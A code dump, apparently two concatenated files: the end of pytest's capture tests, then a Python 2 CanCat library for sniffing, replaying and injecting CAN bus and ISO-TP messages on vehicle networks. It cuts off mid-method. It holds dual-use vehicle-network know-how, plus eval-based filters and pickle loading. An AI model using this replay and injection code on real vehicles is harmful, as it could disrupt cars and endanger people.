with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog", "r") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout", "r") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
out = result_with_capture.stdout.str()
assert ("TypeError: write() argument must be str, not bytes" in out) or (
"TypeError: unicode argument expected, got 'bytes'" in out
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, encoding="utf-8")
with pytest.raises(TypeError):
ef.writelines([b"line1", b"line2"])
assert ef.writelines(["line3", "line4"]) is None # type: ignore[func-returns-value] # noqa: F821
ef.flush()
tmpfile.seek(0)
assert tmpfile.read() == b"line3line4"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
def test__get_multicapture() -> None:
assert isinstance(_get_multicapture("fd"), MultiCapture)
pytest.raises(ValueError, _get_multicapture, "unknown").match(
r"^unknown capturing method: 'unknown'"
)
__init__.py
import os
import sys
import cmd
import time
import serial
import select
import struct
import threading
import cPickle as pickle
from cancat import iso_tp
# defaults for Linux:
serialdev = '/dev/ttyACM0' # FIXME: if Windows: "COM10" is default
baud = 4000000
# command constants (used to identify messages between
# python client and the CanCat transceiver
CMD_LOG = 0x2f
CMD_LOG_HEX = 0x2e
CMD_CAN_RECV = 0x30
CMD_PING_RESPONSE = 0x31
CMD_CHANGE_BAUD_RESULT = 0x32
CMD_CAN_BAUD_RESULT = 0x33
CMD_CAN_SEND_RESULT = 0x34
CMD_ISO_RECV = 0x35
CMD_SET_FILT_MASK = 0x36
CMD_CAN_MODE_RESULT = 0x37
CMD_CAN_SEND_ISOTP_RESULT = 0x38
CMD_CAN_RECV_ISOTP_RESULT = 0x39
CMD_CAN_SENDRECV_ISOTP_RESULT = 0x3A
CMD_SET_FILT_MASK_RESULT = 0x3B
CMD_PING = 0x41
CMD_CHANGE_BAUD = 0x42
CMD_CAN_BAUD = 0x43
CMD_CAN_SEND = 0x44
CMD_CAN_MODE = 0x45
CMD_CAN_MODE_SNIFF_CAN0 = 0x00 # Start sniffing on can 0
CMD_CAN_MODE_SNIFF_CAN1 = 0x01 # Start sniffing on can 1
CMD_CAN_MODE_CITM = 0x02 # Start CITM between can1 and can2
CMD_CAN_SEND_ISOTP = 0x46
CMD_CAN_RECV_ISOTP = 0x47
CMD_CAN_SENDRECV_ISOTP = 0x48
CAN_RESP_OK = (0)
CAN_RESP_FAILINIT = (1)
CAN_RESP_FAILTX = (2)
CAN_RESP_MSGAVAIL = (3)
CAN_RESP_NOMSG = (4)
CAN_RESP_CTRLERROR = (5)
CAN_RESP_GETTXBFTIMEOUT = (6)
CAN_RESP_SENDMSGTIMEOUT = (7)
CAN_RESP_FAIL = (0xff)
CAN_RESPS = { v: k for k,v in globals().items() if k.startswith('CAN_RESP') }
# constants for setting baudrate for the CAN bus
CAN_AUTOBPS = 0
CAN_5KBPS = 1
CAN_10KBPS = 2
CAN_20KBPS = 3
CAN_25KBPS = 4
CAN_31K25BPS = 5
CAN_33KBPS = 6
CAN_40KBPS = 7
CAN_50KBPS = 8
CAN_80KBPS = 9
CAN_83K3BPS = 10
CAN_95KBPS = 11
CAN_100KBPS = 12
CAN_125KBPS = 13
CAN_200KBPS = 14
CAN_250KBPS = 15
CAN_500KBPS = 16
CAN_666KBPS = 17
CAN_1000KBPS = 18
# state constants for the Receiver thread
RXTX_DISCONN = -1
RXTX_SYNC = 0
RXTX_GO = 1
# constants for CANreplay mode
TIMING_FAST = 0
TIMING_REAL = 1
TIMING_INTERACTIVE = 2
# constants for VIEW settings:
VIEW_ASCII = 1<<0
VIEW_COMPARE = 1<<1
VIEW_BOOKMARKS = 1<<2
VIEW_TS_DELTA = 1<<3
VIEW_ENDSUM = 1<<4
VIEW_ALL = VIEW_ASCII | VIEW_COMPARE | VIEW_BOOKMARKS | VIEW_TS_DELTA | VIEW_ENDSUM
# message id's and metadata (soon to be moved into modules)
GM_messages = {
}
Ford_messages = {
}
Chrysler_messages = {
}
Toyota_messages = {
}
Honda_messages = {
}
VW_messages = {
}
Nissan_messages = {
}
Mitsubishi_messages = {
}
Hyundai_messages = {
}
Kia_messages = {
}
Suzuki_messages = {
}
Harley_messages = {
}
# helper functions for printing log messages from the CanCat Transceiver
def handleLogToScreen(message, canbuf):
print('LOG: %s' % repr(message))
def handleLogHexToScreen(message, canbuf):
num = struct.unpack("<L", message)
print('LOG: %x' % num)
def handleCanMsgsDuringSniff(message, canbuf, arbids=None):
idx, ts = canbuf._submitMessage(CMD_CAN_RECV, message)
ts = time.time()
arbid, data = canbuf._splitCanMsg(message)
if arbids:
if arbid in arbids:
print reprCanMsg(idx, ts, arbid, data)
else:
print reprCanMsg(idx, ts, arbid, data)
default_cmdhandlers = {
CMD_LOG : handleLogToScreen,
CMD_LOG_HEX: handleLogHexToScreen,
}
def loadCanBuffer(filename):
return pickle.load(file(filename))
def keystop(delay=0):
    if os.name == 'posix':
        return len(select.select([sys.stdin], [], [], delay)[0])
    else:
        import msvcrt  # Windows-only module, imported lazily here
        return msvcrt.kbhit()
class SPECIAL_CASE(object):
pass
DONT_PRINT_THIS_MESSAGE = SPECIAL_CASE
class CanInterface(object):
def __init__(self, port=serialdev, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None, max_msgs=None):
'''
CAN Analysis Workspace
This can be subclassed by vendor to allow more vendor-specific code
        based on the way each vendor uses the various buses
'''
if orig_iface != None:
self._consumeInterface(orig_iface)
return
self._go = False
self._inbuf = ''
self._trash = []
self._messages = {}
self._msg_events = {}
self._queuelock = threading.Lock()
self._max_msgs = max_msgs
self._shutdown = False
self.verbose = verbose
self.port = port
self._baud = baud
self._io = None
self._in_lock = None
self._out_lock = None
self.name = port
self._commsthread = None
self._last_can_msg = None
self.bookmarks = []
self.bookmark_info = {}
self.comments = []
if cmdhandlers == None:
cmdhandlers = default_cmdhandlers
self._cmdhandlers = cmdhandlers
if load_filename != None:
self.loadFromFile(load_filename)
# If we specify a file and no port, assume we just want to read the file, only try to guess
# ports if there is no file specified
if self.port == None and load_filename == None:
self.port = getDeviceFile()
# No filename, can't guess the port, whatcha gonna do?
if self.port == None and load_filename == None:
raise Exception("Cannot find device, and no filename specified. Please try again.")
if self.port != None:
self._reconnect()
self._startRxThread()
def _startRxThread(self):
self._go = True
self._commsthread = threading.Thread(target=self._rxtx)
self._commsthread.setDaemon(True)
self._commsthread.start()
def register_handler(self, cmd, handler):
self._cmdhandlers[cmd] = handler
def remove_handler(self, cmd):
self._cmdhandlers[cmd] = None
def _consumeInterface(self, other):
other._go = False
for k,v in vars(other).items():
setattr(self, k, v)
if other._commsthread != None:
self._startRxThread()
def _reconnect(self, port=None, baud=None):
'''
Attempt to connect/reconnect to the CanCat Transceiver
'''
if self.port == None and port == None:
print "cannot connect to an unspecified port"
return
if self._io != None:
self._io.close()
self._io = serial.Serial(port=self.port, baudrate=self._baud, dsrdtr=True)
self._io.setDTR(True)
# clear all locks and free anything waiting for them
if self._in_lock != None:
while self._in_lock.locked_lock():
self._in_lock.release()
time.sleep(.01)
self._in_lock = threading.Lock()
if self._out_lock != None:
while self._out_lock.locked_lock():
self._out_lock.release()
time.sleep(.01)
self._out_lock = threading.Lock()
time.sleep(1)
return self._io
def __del__(self):
'''
Destructor, called when the CanInterface object is being garbage collected
'''
if isinstance(self._io, serial.Serial):
print "shutting down serial connection"
self._io.close()
self._shutdown = True
if self._commsthread != None:
            self._commsthread.join()  # threading.Thread has join(), not wait()
def clearCanMsgs(self):
'''
Clear out all messages currently received on the CAN bus, allowing for
basically a new analysis session without creating a new object/connection
returns a list of the messages
'''
return self.recvall(CMD_CAN_RECV)
def _rxtx(self):
'''
Receiver thread runner. Internal use only.
Processes data from the CanCat transceiver, parses and places messages
into correct mailboxes and/or hands off to pre-configured handlers.
'''
self._rxtx_state = RXTX_SYNC
while not self._shutdown:
try:
if not self._go:
time.sleep(.04)
continue
if self.verbose > 4:
if self.verbose > 5:
print "STATE: %s" % self._rxtx_state
else:
sys.stderr.write('.')
# try to reconnect to disconnected unit (FIXME: not working right yet)
if self._rxtx_state == RXTX_DISCONN:
print "FIXME: reconnect disconnected serial port..."
time.sleep(1)
self._reconnect()
self._rxtx_state = RXTX_SYNC
continue
# fill the queue ##########################################
self._in_lock.acquire()
try:
char = self._io.read()
except serial.serialutil.SerialException, e:
self.errorcode = e
self.log("serial exception")
if "disconnected" in e.message:
self._io.close()
self._rxtx_state = RXTX_DISCONN
continue
finally:
if self._in_lock.locked_lock():
self._in_lock.release()
self._inbuf += char
#self.log("RECV: %s" % repr(self._inbuf), 4)
##########################################################
# FIXME: should we make the rest of this a separate thread, so we're not keeping messages from flowing?
# ====== it would require more locking/synchronizing...
# make sure we're synced
if self._rxtx_state == RXTX_SYNC:
if self._inbuf[0] != "@":
self._queuelock.acquire()
try:
idx = self._inbuf.find('@')
if idx == -1:
self.log("sitting on garbage...", 3)
continue
trash = self._inbuf[:idx]
self._trash.append(trash)
self._inbuf = self._inbuf[idx:]
finally:
self._queuelock.release()
self._rxtx_state = RXTX_GO
# handle buffer if we have anything in it
if self._rxtx_state == RXTX_GO:
if len(self._inbuf) < 3: continue
if self._inbuf[0] != '@':
self._rxtx_state = RXTX_SYNC
continue
pktlen = ord(self._inbuf[1]) + 2 # <size>, doesn't include "@"
if len(self._inbuf) >= pktlen:
self._queuelock.acquire()
try:
cmd = ord(self._inbuf[2]) # first bytes are @<size>
message = self._inbuf[3:pktlen]
self._inbuf = self._inbuf[pktlen:]
finally:
self._queuelock.release()
#if we have a handler, use it
cmdhandler = self._cmdhandlers.get(cmd)
if cmdhandler != None:
cmdhandler(message, self)
# otherwise, file it
else:
self._submitMessage(cmd, message)
self._rxtx_state = RXTX_SYNC
except:
if self.verbose:
sys.excepthook(*sys.exc_info())
def _submitMessage(self, cmd, message):
'''
        submits a message to the cmd mailbox, creating the mailbox if it doesn't exist.
*threadsafe*
'''
timestamp = time.time()
self._queuelock.acquire()
try:
mbox = self._messages.get(cmd)
if mbox == None:
mbox = []
self._messages[cmd] = mbox
self._msg_events[cmd] = threading.Event()
mbox.append((timestamp, message))
self._msg_events[cmd].set()
except Exception, e:
self.log("_submitMessage: ERROR: %r" % e, -1)
finally:
self._queuelock.release()
return len(mbox)-1, timestamp
def log(self, message, verbose=2):
'''
print a log message. Only prints if CanCat's verbose setting >=verbose
'''
if self.verbose >= verbose:
print "%.2f %s: %s" % (time.time(), self.name, message)
def recv(self, cmd, wait=None):
'''
Warning: Destructive:
removes a message from a mailbox and returns it.
For CMD_CAN_RECV mailbox, this will alter analysis results!
'''
start = time.time()
while (time.time() - start) < wait:
mbox = self._messages.get(cmd)
if mbox != None and len(mbox):
self._queuelock.acquire()
try:
timestamp, message = mbox.pop(0)
finally:
self._queuelock.release()
return timestamp, message
time.sleep(.01)
return None, None
def recvall(self, cmd):
'''
Warning: Destructive:
removes ALL messages from a mailbox and returns them.
For CMD_CAN_RECV mailbox, this is like getting a new
analysis session
'''
mbox = self._messages.get(cmd)
if mbox == None:
return []
self._queuelock.acquire()
try:
messages = list(mbox)
self._messages[cmd] = []
finally:
self._queuelock.release()
return messages
def _inWaiting(self, cmd):
'''
Does the given cmd mailbox have any messages??
'''
mbox = self._messages.get(cmd)
if mbox == None:
return 0
return len(mbox)
def _send(self, cmd, message):
'''
Send a message to the CanCat transceiver (not the CAN bus)
'''
msgchar = struct.pack(">H", len(message) + 3) # 2 byte Big Endian
msg = msgchar + chr(cmd) + message
self.log("XMIT: %s" % repr(msg), 4)
self._out_lock.acquire()
try:
self._io.write(msg)
finally:
self._out_lock.release()
# FIXME: wait for response?
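    # A minimal sketch of the host-to-transceiver framing built by _send(): a two
    # byte big-endian length (payload length + 3), one command byte, then the raw
    # payload. The concrete values below are only an illustration for CMD_PING
    # with a 4 byte payload, not captured traffic:
    #
    #   cmd, payload = CMD_PING, 'ABCD'
    #   frame = struct.pack(">H", len(payload) + 3) + chr(cmd) + payload
    #   # frame == '\x00\x07' + '\x41' + 'ABCD'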
def CANrecv(self, count=1):
'''
Warning: Destructive:
removes a message from the received CAN messages and returns it.
== This will alter analysis results! ==
'''
if count == -1:
count = self.getCanMsgCount()
for x in range(count):
yield self.recv(CMD_CAN_RECV)
def CANxmit(self, arbid, message, extflag=0, timeout=3, count=1):
'''
Transmit a CAN message on the attached CAN bus
Currently returns the *last* result
'''
msg = struct.pack('>I', arbid) + chr(extflag) + message
for i in range(count):
self._send(CMD_CAN_SEND, msg)
ts, result = self.recv(CMD_CAN_SEND_RESULT, timeout)
if result == None:
print "CANxmit: Return is None!?"
return None
resval = ord(result)
if resval != 0:
print "CANxmit() failed: %s" % CAN_RESPS.get(resval)
return resval
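    # Illustrative usage only -- the device path and arbitration ID below are
    # assumptions for the example (0x7df is the conventional OBD-II functional
    # request ID), not values defined by this module:
    #
    #   cc = CanInterface(port='/dev/ttyACM0')
    #   cc.setCanBaud(CAN_500KBPS)
    #   cc.CANxmit(0x7df, '\x02\x01\x00\x00\x00\x00\x00\x00')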
def ISOTPxmit(self, tx_arbid, rx_arbid, message, extflag=0, timeout=3, count=1):
'''
Transmit an ISOTP can message. tx_arbid is the arbid we're transmitting,
and rx_arbid is the arbid we're listening for
'''
msg = struct.pack('>IIB', tx_arbid, rx_arbid, extflag) + message
for i in range(count):
self._send(CMD_CAN_SEND_ISOTP, msg)
ts, result = self.recv(CMD_CAN_SEND_ISOTP_RESULT, timeout)
            if result == None:
                print "ISOTPxmit: Return is None!?"
                return None
            resval = ord(result)
if resval != 0:
print "ISOTPxmit() failed: %s" % CAN_RESPS.get(resval)
return resval
def ISOTPrecv(self, tx_arbid, rx_arbid, extflag=0, timeout=3, count=1, start_msg_idx=None):
'''
Receives an ISOTP can message. This function just causes
the hardware to send the appropriate flow control command
when an ISOTP frame is received from rx_arbid, using
tx_arbid for the flow control frame. The ISOTP frame
itself needs to be extracted from the received can messages
'''
if start_msg_idx is None:
start_msg_idx = self.getCanMsgCount()
# set the CANCat to respond to Flow Control messages
resval = self._isotp_enable_flowcontrol(tx_arbid, rx_arbid, extflag)
        msg = self._isotp_get_msg(rx_arbid, start_index=start_msg_idx, timeout=timeout)
return msg
    def _isotp_enable_flowcontrol(self, tx_arbid, rx_arbid, extflag, timeout=3):
        msg = struct.pack('>IIB', tx_arbid, rx_arbid, extflag)
        self._send(CMD_CAN_RECV_ISOTP, msg)
        ts, result = self.recv(CMD_CAN_RECV_ISOTP_RESULT, timeout)
        if result == None:
            print "_isotp_enable_flowcontrol: Return is None!?"
            return None
        resval = ord(result)
        if resval != 0:
            print "_isotp_enable_flowcontrol() failed: %s" % CAN_RESPS.get(resval)
        return resval
def ISOTPxmit_recv(self, tx_arbid, rx_arbid, message, extflag=0, timeout=3, count=1, service=None):
'''
Transmit an ISOTP can message, then wait for a response.
tx_arbid is the arbid we're transmitting, and rx_arbid
is the arbid we're listening for
'''
currIdx = self.getCanMsgCount()
msg = struct.pack('>II', tx_arbid, rx_arbid) + chr(extflag) + message
for i in range(count):
self._send(CMD_CAN_SENDRECV_ISOTP, msg)
ts, result = self.recv(CMD_CAN_SENDRECV_ISOTP_RESULT, timeout)
            if result == None:
                print "ISOTPxmit_recv: Return is None!?"
            else:
                resval = ord(result)
                if resval != 0:
                    print "ISOTPxmit_recv() failed: %s" % CAN_RESPS.get(resval)
msg = self._isotp_get_msg(rx_arbid, start_index = currIdx, service = service, timeout = timeout)
return msg
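    # Illustrative usage only -- 0x7e0/0x7e8 are common UDS request/response
    # arbitration IDs, '\x22\xf1\x90' is a UDS ReadDataByIdentifier request for
    # the VIN, and 0x62 is its positive-response service ID; all of these are
    # assumptions for the example, not values defined by this module:
    #
    #   resp = cc.ISOTPxmit_recv(0x7e0, 0x7e8, '\x22\xf1\x90', service=0x62)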
def _isotp_get_msg(self, rx_arbid, start_index=0, service=None, timeout=None):
'''
Internal Method to piece together a valid ISO-TP message from received CAN packets.
'''
found = False
complete = False
starttime = lasttime = time.time()
while not complete and (not timeout or (lasttime-starttime < timeout)):
msgs = [msg for msg in self.genCanMsgs(start=start_index, arbids=[rx_arbid])]
if len(msgs):
try:
# Check that the message is for the expected service, if specified
arbid, msg, count = iso_tp.msg_decode(msgs)
if ord(msg[0]) == 0x7e: # response for TesterPresent... ignore
start_index = msgs[count-1][0] + 1
elif service is not None:
# Check if this is the right service, or there was an error
if ord(msg[0]) == service or ord(msg[0]) == 0x7f:
msg_found = True
return msg
print "Hey, we got here, wrong service code?"
print msg.encode('hex')
start_index = msgs[count-1][0] + 1
else:
msg_found = True
return msg
except iso_tp.IncompleteIsoTpMsg, e:
#print e # debugging only, this is expected
pass
time.sleep(0.1)
lasttime = time.time()
#print "_isotp_get_msg: status: %r - %r (%r) > %r" % (lasttime, starttime, (lasttime-starttime), timeout)
print "_isotp_get_msg: Timeout: %r - %r (%r) > %r" % (lasttime, starttime, (lasttime-starttime), timeout)
return None
def CANsniff(self, start_msg=None, arbids=None, advfilters=[], maxmsgs=None):
'''
Print messages in real time.
start_msg - first message to print
(None: the next message captured, 0: first message since starting CanCat)
arbids - list of arbids to print (others will be ignored)
advfilters - list of python code to eval for each message (message context provided)
eg. ['pf==0xeb', 'sa==0', 'ps & 0xf']
will print TP data message from source address 0 if the top 4 bits of PS
are set.
            Expressions are evaluated from left to right in an "and"-like fashion. If any
            expression evaluates to "False", the message will be ignored.
Variables mapped into default namespace:
'arbid'
'id'
'ts'
'data'
J1939 adds 'pgn', 'pf', 'ps', 'edp', 'dp', 'sa'
(this description is true for all advfilters, not specifically CANsniff)
'''
count = 0
msg_gen = self.reprCanMsgsLines(start_msg=start_msg, arbids=arbids, advfilters=advfilters, tail=True)
while True:
if maxmsgs != None and maxmsgs < count:
return
line = msg_gen.next()
print line
count += 1
if keystop():
break
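    # Illustrative usage only (the arbids and filter strings are made up for the
    # example). Each advfilter string is eval'd against the per-message namespace
    # built by _getLocals() -- idx, ts, arbid, data -- so plain Python expressions
    # over those names work:
    #
    #   cc.CANsniff(arbids=[0x123, 0x456])
    #   cc.CANsniff(advfilters=['arbid == 0x7e8', 'len(data) == 8'])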
def CANreplay(self, start_bkmk=None, stop_bkmk=None, start_msg=0, stop_msg=None, arbids=None, timing=TIMING_FAST):
'''
Replay packets between two bookmarks.
timing = TIMING_FAST: just slam them down the CAN bus as fast as possible
        timing = TIMING_REAL: send the messages using similar timing to how they
were received
timing = TIMING_INTERACTIVE: wait for the user to press Enter between each
message being transmitted
'''
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
last_time = -1
newstamp = time.time()
for idx,ts,arbid,data in self.genCanMsgs(start_msg, stop_msg, arbids=arbids):
laststamp = newstamp
newstamp = time.time()
delta_correction = newstamp - laststamp
if timing == TIMING_INTERACTIVE:
char = raw_input("Transmit this message? %s (Y/n)" % reprCanMsg(idx, ts, arbid, data))
if char is not None and len(char) > 0 and char[0] == 'n':
return
elif timing == TIMING_REAL:
if last_time != -1:
delta = ts - last_time - delta_correction
if delta >= 0:
time.sleep(delta)
last_time = ts
self.CANxmit(arbid, data)
if timing == TIMING_INTERACTIVE:
print "Message transmitted"
def setCanBaud(self, baud_const=CAN_500KBPS):
'''
set the baud rate for the CAN bus. this has nothing to do with the
connection from the computer to the tool
'''
self._send(CMD_CAN_BAUD, chr(baud_const))
response = self.recv(CMD_CAN_BAUD_RESULT, wait=30)
while(response[1] != '\x01'):
print "CAN INIT FAILED: Retrying"
response = self.recv(CMD_CAN_BAUD_RESULT, wait=30)
def setCanMode(self, mode):
'''
Sets the desired operation mode. Note that just setting the operational mode
does not change anything on the hardware, after changing the mode you must change
the baud rate in order to properly configure the hardware
'''
        CAN_MODES = { v: k for k,v in globals().items() if k.startswith('CMD_CAN_MODE_') and k != 'CMD_CAN_MODE_RESULT' }
if mode not in CAN_MODES:
print "{} is not a valid can mode. Valid modes are:".format(mode)
for k in CAN_MODES:
print "{} ({})".format(CAN_MODES[k], k)
else:
self._send(CMD_CAN_MODE, chr(mode))
response = self.recv(CMD_CAN_MODE_RESULT, wait=30)
while(response[1] != '\x01'):
print "CAN INIT FAILED: Retrying"
response = self.recv(CMD_CAN_MODE_RESULT, wait=30)
def ping(self, buf='ABCDEFGHIJKL'):
'''
Utility function, only to send and receive data from the
CanCat Transceiver. Has no effect on the CAN bus
'''
self._send(CMD_PING, buf)
response = self.recv(CMD_PING_RESPONSE, wait=3)
return response
def genCanMsgs(self, start=0, stop=None, arbids=None, tail=False, maxsecs=None):
'''
CAN message generator. takes in start/stop indexes as well as a list
of desired arbids (list)
maxsecs limits the number of seconds this generator will go for. it's intended
for use with tail
'''
messages = self._messages.get(CMD_CAN_RECV, None)
# get the ts of the first received message
if messages != None and len(messages):
startts = messages[0][0]
else:
startts = time.time()
if start == None:
start = self.getCanMsgCount()
if messages == None:
stop = 0
elif stop == None or tail:
stop = len(messages)
else:
stop = stop + 1 # This makes the stop index inclusive if specified
starttime = time.time()
idx = start
while tail or idx < stop:
# obey our time restrictions
# placed here to ensure checking whether we're receiving messages or not
if maxsecs != None and time.time() > maxsecs+starttime:
return
# If we start sniffing before we receive any messages,
# messages will be "None". In this case, each time through
# this loop, check to see if we have messages, and if so,
# re-create the messages handle
if messages == None:
messages = self._messages.get(CMD_CAN_RECV, None)
# if we're off the end of the original request, and "tailing"
if messages != None:
if tail and idx >= stop:
msglen = len(messages)
self.log("stop=%d len=%d" % (stop, msglen), 3)
if stop == msglen:
self.log("waiting for messages", 3)
# wait for trigger event so we're not constantly polling
self._msg_events[CMD_CAN_RECV].wait(1)
self._msg_events[CMD_CAN_RECV].clear()
self.log("received 'new messages' event trigger", 3)
# we've gained some messages since last check...
stop = len(messages)
continue # to the big message loop.
# now actually handle messages
ts, msg = messages[idx]
# make ts an offset instead of the real time.
ts -= startts
arbid, data = self._splitCanMsg(msg)
if arbids != None and arbid not in arbids:
# allow filtering of arbids
idx += 1
continue
yield((idx, ts, arbid, data))
idx += 1
def _splitCanMsg(self, msg):
'''
takes in captured message
returns arbid and data
does not check msg size. MUST be at least 4 bytes in length as the
tool should send 4 bytes for the arbid
'''
arbid = struct.unpack(">I", msg[:4])[0]
data = msg[4:]
return arbid, data
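    # A minimal sketch of the layout _splitCanMsg() expects: a 4 byte big-endian
    # arbitration ID followed by the data bytes. Values are illustrative only:
    #
    #   arbid, data = cc._splitCanMsg('\x00\x00\x07\xdfhello')
    #   # arbid == 0x7df, data == 'hello'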
def getCanMsgCount(self):
'''
the number of CAN messages we've received this session
'''
canmsgs = self._messages.get(CMD_CAN_RECV, [])
return len(canmsgs)
def printSessionStatsByBookmark(self, start=None, stop=None):
'''
Prints session stats only for messages between two bookmarks
'''
print self.getSessionStatsByBookmark(start, stop)
def printSessionStats(self, start=0, stop=None):
'''
Print session stats by Arbitration ID (aka WID/PID/CANID/etc...)
between two message indexes (where they sit in the CMD_CAN_RECV
mailbox)
'''
print self.getSessionStats(start, stop)
def getSessionStatsByBookmark(self, start=None, stop=None):
'''
returns session stats by bookmarks
'''
if start != None:
start_msg = self.getMsgIndexFromBookmark(start)
else:
start_msg = 0
if stop != None:
stop_msg = self.getMsgIndexFromBookmark(stop)
else:
stop_msg = self.getCanMsgCount()
return self.getSessionStats(start=start_msg, stop=stop_msg)
def getArbitrationIds(self, start=0, stop=None, reverse=False):
'''
return a list of Arbitration IDs
'''
arbids = {}
msg_count = 0
for idx,ts,arbid,data in self.genCanMsgs(start, stop):
arbmsgs = arbids.get(arbid)
if arbmsgs == None:
arbmsgs = []
arbids[arbid] = arbmsgs
arbmsgs.append((ts, data))
msg_count += 1
arbid_list = [(len(msgs), arbid, msgs) for arbid,msgs in arbids.items()]
arbid_list.sort(reverse=reverse)
return arbid_list
def getSessionStats(self, start=0, stop=None):
out = []
arbid_list = self.getArbitrationIds(start=start, stop=stop, reverse=True)
for datalen, arbid, msgs in arbid_list:
last = 0
high = 0
low = 0xffffffff
for ts, data in msgs:
if last == 0:
last = ts
continue
# calculate the high and low
delta = ts - last
if delta > high:
high = delta
if delta < low:
low = delta
# track repeated values (rounded to nearest .001 sec)
last = ts
if datalen > 1:
mean = (msgs[-1][0] - msgs[0][0]) / (datalen-1)
median = low + (high-low) / 2
else:
low = 0
mean = 0
median = mean
out.append("id: 0x%x\tcount: %d\ttiming:: mean: %.3f\tmedian: %.3f\thigh: %.3f\tlow: %.3f" % \
(arbid, datalen, mean, median, high, low))
msg_count = self.getCanMsgCount()
out.append("Total Uniq IDs: %d\nTotal Messages: %d" % (len(arbid_list), msg_count))
return '\n'.join(out)
def loadFromFile(self, filename, force=False):
'''
Load a previous analysis session from a saved file
see: saveSessionToFile()
'''
me = pickle.load(file(filename))
self.restoreSession(me, force=force)
self._filename = filename
def restoreSession(self, me, force=False):
'''
Load a previous analysis session from a python dictionary object
see: saveSession()
'''
if isinstance(self._io, serial.Serial) and force==False:
print("Refusing to reload a session while active session! use 'force=True' option")
return
self._messages = me.get('messages')
self.bookmarks = me.get('bookmarks')
self.bookmark_info = me.get('bookmark_info')
self.comments = me.get('comments')
def saveSessionToFile(self, filename=None):
'''
Saves the current analysis session to the filename given
If saved previously, the name will already be cached, so it is
unnecessary to provide it again.
'''
if filename != None:
self._filename = filename
elif self._filename == None:
raise Exception('Cannot save to file when no filename given (and first time save)')
else:
filename = self._filename
savegame = self.saveSession()
me = pickle.dumps(savegame)
outfile = file(filename, 'w')
outfile.write(me)
outfile.close()
def saveSession(self):
'''
Save the current analysis session to a python dictionary object
        What you do with it from there is your own business.
This function is called by saveSessionToFile() to get the data
to save to the file.
'''
savegame = { 'messages' : self._messages,
'bookmarks' : self.bookmarks,
'bookmark_info' : self.bookmark_info,
'comments' : self.comments,
}
return savegame
# bookmark subsystem
def placeCanBookmark(self, name=None, comment=None):
'''
Save a named bookmark (with optional comment).
This stores the message index number from the
CMD_CAN_RECV mailbox.
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
mbox = self._messages.get(CMD_CAN_RECV)
if mbox == None:
msg_index = 0
else:
msg_index = len(mbox)
bkmk_index = len(self.bookmarks)
self.bookmarks.append(msg_index)
info = { 'name' : name,
'comment' : comment }
self.bookmark_info[bkmk_index] = info #should this be msg_index? benefit either way?
return bkmk_index
def getMsgIndexFromBookmark(self, bkmk_index):
return self.bookmarks[bkmk_index]
def getBookmarkFromMsgIndex(self, msg_index):
bkmk_index = self.bookmarks.index(msg_index)
return bkmk_index
    def setCanBookmarkName(self, bkmk_index, name):
        info = self.bookmark_info[bkmk_index]
        info['name'] = name
    def setCanBookmarkComment(self, bkmk_index, comment):
        info = self.bookmark_info[bkmk_index]
        info['comment'] = comment
    def setCanBookmarkNameByMsgIndex(self, msg_index, name):
        bkmk_index = self.bookmarks.index(msg_index)
        info = self.bookmark_info[bkmk_index]
        info['name'] = name
    def setCanBookmarkCommentByMsgIndex(self, msg_index, comment):
        bkmk_index = self.bookmarks.index(msg_index)
        info = self.bookmark_info[bkmk_index]
        info['comment'] = comment
def snapshotCanMessages(self, name=None, comment=None):
'''
Save bookmarks at the start and end of some event you are about to do
Bookmarks are named "Start_" + name and "Stop_" + name
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
start_bkmk = self.placeCanBookmark("Start_" + name, comment)
raw_input("Press Enter When Done...")
stop_bkmk = self.placeCanBookmark("Stop_" + name, comment)
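    # Illustrative workflow only (the snapshot name is made up, and the bookmark
    # indexes assume these are the first two bookmarks of the session):
    #
    #   cc.snapshotCanMessages('door_unlock')            # press Enter when the action is done
    #   cc.printCanMsgsByBookmark(start_bkmk=0, stop_bkmk=1)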
def filterCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
else:
            stop_msg = None
if start_baseline_bkmk != None:
